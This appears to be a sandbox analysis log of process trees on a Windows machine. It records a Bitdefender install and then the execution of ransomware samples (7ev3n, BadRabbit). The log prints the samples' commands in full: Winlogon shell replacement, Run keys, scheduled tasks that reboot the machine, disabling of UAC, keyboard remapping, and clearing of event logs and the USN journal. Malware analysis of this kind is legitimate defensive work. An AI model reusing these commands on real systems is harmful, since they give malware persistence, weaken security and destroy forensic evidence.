      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5876 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2916 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6436 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7136 /prefetch:8
    C:\Users\Admin\Downloads\bitdefender_tsecurity.exe
      "C:\Users\Admin\Downloads\bitdefender_tsecurity.exe"
      - Executes dropped EXE
      - Checks computer location settings
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exe"
          - Executes dropped EXE
          - Checks computer location settings
            C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exe"
              - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\setuppackage.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\setuppackage.exe"
                  - Executes dropped EXE
                C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\installer.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Drops file in Program Files directory
                  - Modifies system certificate store
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of SetWindowsHookEx
                    C:\Program Files\Bitdefender Agent\ProductAgentService.exe
                      "C:\Program Files\Bitdefender Agent\ProductAgentService.exe" protect
                      - Executes dropped EXE
                      - Loads dropped DLL
                    C:\Program Files\Bitdefender Agent\ProductAgentService.exe
                      "C:\Program Files\Bitdefender Agent\ProductAgentService.exe" install
                      - Executes dropped EXE
                      - Loads dropped DLL
                    C:\Program Files\Bitdefender Agent\ProductAgentService.exe
                      "C:\Program Files\Bitdefender Agent\ProductAgentService.exe" enable
                      - Executes dropped EXE
                      - Loads dropped DLL
                    C:\Program Files\Bitdefender Agent\ProductAgentService.exe
                      "C:\Program Files\Bitdefender Agent\ProductAgentService.exe" start "C:\Users\Admin\Downloads\bitdefender_tsecurity.exe"
                      - Executes dropped EXE
                      - Loads dropped DLL
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6896 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6932 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6864 /prefetch:2
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6468 /prefetch:8
    C:\Users\Admin\Downloads\winrar-x64-611.exe
      "C:\Users\Admin\Downloads\winrar-x64-611.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Drops file in Program Files directory
      - Suspicious use of SetWindowsHookEx
        C:\Program Files\WinRAR\uninstall.exe
          "C:\Program Files\WinRAR\uninstall.exe" /setup
          - Modifies system executable filetype association
          - Executes dropped EXE
          - Registers COM server for autorun
          - Modifies registry class
        C:\Users\Admin\vmkEcMcU\xMEwQkYA.exe
          "C:\Users\Admin\vmkEcMcU\xMEwQkYA.exe"
          - Executes dropped EXE
          - Adds Run key to start application
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6448 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3232 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\WinRAR\WinRAR.exe
      "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\MalwareDatabase-master.zip"
      - Executes dropped EXE
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Bitdefender Agent\redline\bdredline.exe
  "C:\Program Files\Bitdefender Agent\redline\bdredline.exe"
  - Executes dropped EXE
  - Loads dropped DLL
C:\Program Files\Bitdefender Agent\ProductAgentService.exe
  "C:\Program Files\Bitdefender Agent\ProductAgentService.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
    C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe
      "C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe" install
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Modifies system certificate store
        C:\Windows\SysWOW64\regsvr32.exe
          regsvr32 /s "C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoveryComp.dll"
          - Loads dropped DLL
          - Modifies registry class
    C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe
      "C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies data under HKEY_USERS
    C:\Program Files\Bitdefender Agent\ProductAgentService.exe
      "ProductAgentService.exe" login_silent
      - Executes dropped EXE
      - Loads dropped DLL
    C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe
      "C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe" show=progress event_retry=Global\7295237F-E98C-4C46-A4A4-07F0D66278C2
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies data under HKEY_USERS
    C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe
      "C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe" install
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
    C:\Windows\TEMP\bd_DF20.tmp\wekDF21.tmp
      "C:\Windows\TEMP\bd_DF20.tmp\wekDF21.tmp" /source:web /attach
      - Executes dropped EXE
      - Checks computer location settings
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\installer.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\installer.exe" /kitArchive
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Suspicious use of SetWindowsHookEx
            C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\Installer.exe
              "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\Installer.exe" /attach /source:web /setup-folder:"CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"
              - Drops file in Drivers directory
              - Executes dropped EXE
              - Uses Session Manager for persistence
              - Checks BIOS information in registry
              - Drops file in Program Files directory
              - Drops file in Windows directory
              - Checks processor information in registry
              - Enumerates system info in registry
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: LoadsDriver
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of SetWindowsHookEx
                C:\Program Files\Bitdefender Agent\ProductAgentUI.exe
                  "C:\Program Files\Bitdefender Agent\ProductAgentUI.exe" attach=524888
                  - Executes dropped EXE
                  - Suspicious use of SetWindowsHookEx
                C:\Windows\system32\pnputil.exe
                  "C:\Windows\system32\pnputil.exe" -a "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\trufos.inf"
                  - Drops file in Windows directory
                C:\Windows\system32\pnputil.exe
                  "C:\Windows\system32\pnputil.exe" -a "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\vlflt.inf"
                  - Drops file in Windows directory
                C:\Windows\system32\fltmc.exe
                  "C:\Windows\system32\fltmc.exe" load vlflt
                  - Suspicious behavior: LoadsDriver
                  - Suspicious use of AdjustPrivilegeToken
                C:\Windows\system32\sc.exe
                  "C:\Windows\system32\sc.exe" control bdauxsrv 128
                  - Launches sc.exe
                C:\Windows\system32\sc.exe
                  "C:\Windows\system32\sc.exe" control vsserv 128
                  - Launches sc.exe
                C:\Windows\system32\fltmc.exe
                  "C:\Windows\system32\fltmc.exe" unload vlflt
                  - Suspicious use of AdjustPrivilegeToken
                C:\Windows\system32\pnputil.exe
                  "C:\Windows\system32\pnputil.exe" -d oem3.inf
                  - Drops file in Windows directory
                  - Checks SCSI registry key(s)
                C:\Windows\system32\pnputil.exe
                  "C:\Windows\system32\pnputil.exe" -d oem2.inf
                  - Drops file in Windows directory
                  - Checks SCSI registry key(s)
                C:\Windows\system32\sc.exe
                  "C:\Windows\system32\sc.exe" control bdprotsrv 128
                  - Launches sc.exe
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
  - Drops file in Windows directory
C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl
  - Checks computer location settings
    C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" ms-settings:display
C:\Windows\explorer.exe
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\DrvInst.exe
      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{dacfef6a-e2e8-584e-831f-6fc470064105}\trufos.inf" "9" "44fa39f97" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Checks SCSI registry key(s)
      - Modifies data under HKEY_USERS
    C:\Windows\system32\DrvInst.exe
      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{b233fcce-da23-7045-aeb1-bf42baeed530}\vlflt.inf" "9" "416afd99f" "0000000000000164" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Checks SCSI registry key(s)
      - Modifies data under HKEY_USERS
    C:\Windows\system32\DrvInst.exe
      DrvInst.exe "5" "2" "C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf" "0" "4129e6957" "000000000000017C" "WinSta0\Default"
      - Drops file in System32 directory
      - Drops file in Windows directory
    C:\Windows\system32\DrvInst.exe
      DrvInst.exe "5" "2" "C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf" "0" "46be853c7" "0000000000000180" "WinSta0\Default"
      - Drops file in System32 directory
      - Drops file in Windows directory
C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -imon1 "-anf=C:\Users\Admin\AppData\Local\Temp\Rar$LS968.32088" -scul -- "C:\Users\Admin\Desktop\7ev3n.zip" C:\Users\Admin\Desktop\
  - Executes dropped EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe95074f50,0x7ffe95074f60,0x7ffe95074f70
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1608 /prefetch:2
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2420 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -imon1 "-anf=C:\Users\Admin\AppData\Local\Temp\Rar$LS968.46569" -scul -- "C:\Users\Admin\Desktop\DeriaLock.zip" C:\Users\Admin\Desktop\
  - Executes dropped EXE
C:\Users\Admin\Desktop\Endermanch@7ev3n.exe
  "C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"
  - Executes dropped EXE
    C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      - Executes dropped EXE
        C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        C:\Windows\SysWOW64\SCHTASKS.exe
          C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
          - Creates scheduled task(s)
        C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
              - Modifies WinLogon for persistence
        C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
- Adds Run key to start application
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- UAC bypass
-
C:\Users\Admin\Desktop\Endermanch@BadRabbit.exe"C:\Users\Admin\Desktop\Endermanch@BadRabbit.exe"1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 152⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2811355712 && exit"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:47:003⤵
-
C:\Windows\6402.tmp"C:\Windows\6402.tmp" \\.\pipe\{7C79FA16-2FE9-4E6F-8092-B6429690269A}3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:3⤵
